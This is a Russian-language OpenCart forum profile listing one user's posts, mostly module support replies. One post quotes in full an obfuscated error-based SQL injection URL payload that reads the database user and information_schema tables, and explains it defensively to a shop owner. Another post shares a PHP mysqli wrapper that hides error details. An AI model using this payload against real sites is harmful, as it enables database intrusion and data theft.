Jump to content

ArtemPitov

Пользователи
  • Content Count

    4,056
  • Joined

  • Last visited

 Content Type 

Profiles

Forums

Downloads

Статьи

История версий

Store

Blogs

Downloads Plus Support

module__dplus_manager

Everything posted by ArtemPitov

  1. /index.php?route=product/product&path=199_200&product_id=8565'+and(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+%2f**%2fcAsT(%2f**%2fcOnCaT(0x217e21,%2f**%2fuSeR(),0x217e21)+as+char))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a)+and+'1'='1 Вас пытались пробить через страницу товара и получить список всех таблиц магазина information_schema https://dev.mysql.com/doc/refman/8.0/en/information-schema-introduction.html для дальнейшей атаки, метод построен на базе Deep Blind SQL Injection но УВ, на этой странице не пробить, второй вектор будет скорее всего по портам 22 1500, если не проводились действия по предотвращении от брута и не стоят надежные пароли, вполне вероятно могут получить рута, были такие случаи когда хостеры небрежно относились к этому, также стоит проверить все формы на сайте, если есть загрузка файлов, тоже лучше отключить, посмотрите какие Вы используете модули и откуда они брались.
  2. Да, все верно, так и работает, все проверяется на ИЛИ, если имя и фамилия одинаковая скорее этот человек уже покупал, если нужно убрать проверку, напишите мне в лс
  3. Вполне возможно если нет имени, модуль проверяет по принципу «ИЛИ»
  4. Давно все жалуются что при ошибках MySQL получаем пароли, набросал вот такую обертку, не претендую на уникальность, если у Вас есть замечания или предложения, всегда welcom =) mysqli.php <?php namespace DB; final class MySQLi { private $connection; public function __construct( $hostname, $username, $password, $database, $port = '3306' ) { try { \mysqli_report( MYSQLI_REPORT_STRICT ); $this->connection = new \mysqli( $hostname, $username, $password, $database, $port ); $this->connection->set_charset( "utf8" ); $this->connection->query( "SET SQL_MODE = ''" ); } catch ( \mysqli_sql_exception $e ) { if ( \defined( 'IS_DEV' ) && IS_DEV ) { throw $e; } } } public function query( $sql ) { try { if ( !\is_null($this->connection) ) { $query = $this->connection->query( $sql ); } } catch ( \mysqli_sql_exception $e ) { if ( \defined( 'IS_DEV' ) && IS_DEV ) { throw $e; } } if ( !\is_null($this->connection) && !$this->connection->errno ) { if ( $query instanceof \mysqli_result ) { $data = array(); while ( $row = $query->fetch_assoc() ) { $data[] = $row; } $result = new \stdClass(); $result->num_rows = $query->num_rows; $result->row = isset($data[0]) ? $data[0] : array(); $result->rows = $data; $query->close(); return $result; } return true; } } public function escape($value) { if ( !\is_null($this->connection) ) { return $this->connection->real_escape_string($value); } return false; } public function countAffected() { if ( !\is_null($this->connection) ) { return $this->connection->affected_rows; } return false; } public function getLastId() { if ( !\is_null($this->connection) ) { return $this->connection->insert_id; } return false; } public function connected() { if ( !\is_null($this->connection) ) { return $this->connection->ping(); } return false; } public function __destruct() { if ( !\is_null($this->connection) ) { $this->connection->close(); } } }
  5. @Twix87 есть наработки с 1,5, я их переделаю, модуль только формирует заказы и отправляет треки, этого всем достаточно ?
  6. а у Вас стоят какие-то сторонние модули редактирования заказов ?
  7. @vintorez2 дайте мне доступы в ЛС, протестирую как у Вас все происходит
  8. Здравствуйте, в процессе, по планах сегодня доделать
  9. А когда Вы обновляли модуль ? Редактируете через стандартный функционала ? Я проверил на OpenCart 2.3 нет такой проблемы У кого-то подобное повторялось после последнего обновления ?
  10. банально просто, при авторизации можно заходить инкогнито
  11. это было исправлено, пишите в лс, будем смотреть что у вас не работает
  12. @Petr123 не вижу от Вас сообщение, напишите пожалуйста еще раз
  13. @kimk пока не планирую, но я думаю будет и под 3
  14. Вы модуль когда обновляли ? Напишите мне в понедельник в ЛС, посмотрим что у Вас не так работает
  15. @Alex7325 это все будет в новой версии, в планах отказаться от купонов вообще в пользу индивидуальной скидки
  16. в планах гугловская, я посмотрю на этот вариант
×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.